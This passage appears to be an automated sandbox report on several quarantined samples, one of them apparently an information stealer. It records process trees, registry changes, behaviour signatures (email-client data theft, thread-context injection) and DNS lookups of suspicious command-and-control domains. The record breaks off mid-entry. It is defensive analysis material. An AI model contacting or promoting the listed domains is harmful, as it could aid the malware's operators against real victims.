"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2212,16511908646446146674,12019144910725962583,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16511908646446146674,12019144910725962583,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16511908646446146674,12019144910725962583,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,16511908646446146674,12019144910725962583,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,16511908646446146674,12019144910725962583,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16511908646446146674,12019144910725962583,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5196 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16511908646446146674,12019144910725962583,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4748 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16511908646446146674,12019144910725962583,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16511908646446146674,12019144910725962583,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2212,16511908646446146674,12019144910725962583,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4876 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
N/A 224.0.0.251:5353 udp

Files


Analysis: behavioral23

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win10v2004-20250217-en

Max time kernel

94s

Max time network

138s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

Signatures

Reads user/profile data of local email clients

spyware stealer

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4456 set thread context of 512 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 4456 -ip 4456

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4456 -s 788

Network

Country Destination Domain Proto
US 8.8.8.8:53 fearleszsjourney.tech udp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 8.8.8.8:53 hobbyedsmoker.live udp
US 8.8.8.8:53 dsfljsdfjewf.info udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 decreaserid.world udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
FR 2.18.131.137:443 steamcommunity.com tcp
US 8.8.8.8:53 disobilittyhell.live udp
US 104.21.81.29:443 disobilittyhell.live tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files


Analysis: behavioral1

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe"

Network

N/A

Files

memory/2484-0-0x000000013F020000-0x000000013F1CE000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win7-20241010-en

Max time kernel

136s

Max time network

136s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\imfsCjY.html

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D843E861-F49B-11EF-BD8C-6252F262FB8A} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d1363a07505a3e43b8c14d85afab89fd0000000002000000000010660000000100002000000005b633f615a6f11ba754292ed7a69a2463e067b453ca2b00b44f5377d997435f000000000e8000000002000020000000eb1e02e210a3633cc8b088a6dcac7ed8c8fefdd223b499bb0a2129fc40d82ef320000000aaeaed1fc891ae768606ae700cec1a8b3afd1f47eb0d89828456fcb04588b0b740000000b961e757cc66c50a873de34c2610a8f6b69bf59899ae24ef0a13c7fa692dd591d3f56eb2e9339baa378fa06aa81260c9fb0dc5a9276b1ca83d9310f6967d7146 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446775435" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 60f552ada888db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\imfsCjY.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2768 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\Cab97CE.tmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\Local\Temp\Tar98FF.tmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Analysis: behavioral17

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win10v2004-20250217-en

Max time kernel

146s

Max time network

148s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\imfsCjY.html

Signatures

Browser Information Discovery

discovery

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4316 wrote to memory of 3828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4316 wrote to memory of 3912 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4316 wrote to memory of 1728 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4316 wrote to memory of 4164 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\imfsCjY.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8b3a246f8,0x7ff8b3a24708,0x7ff8b3a24718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,14151449084664756988,9962506119470495701,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,14151449084664756988,9962506119470495701,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,14151449084664756988,9962506119470495701,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,14151449084664756988,9962506119470495701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,14151449084664756988,9962506119470495701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,14151449084664756988,9962506119470495701,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5196 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,14151449084664756988,9962506119470495701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,14151449084664756988,9962506119470495701,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,14151449084664756988,9962506119470495701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4108 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,14151449084664756988,9962506119470495701,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,14151449084664756988,9962506119470495701,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2244 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

\??\pipe\LOCAL\crashpad_4316_EMVACURQLVHIMEBR

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\d6f1baaf-172b-462e-93b5-8eca9e1e14fa.tmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Analysis: behavioral21

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win10v2004-20250217-en

Max time kernel

145s

Max time network

141s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\ninite22.html

Signatures

Browser Information Discovery

discovery

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3436 wrote to memory of 1668 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 1924 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\ninite22.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa24a546f8,0x7ffa24a54708,0x7ffa24a54718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,1254722498498580642,7100628006893330437,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

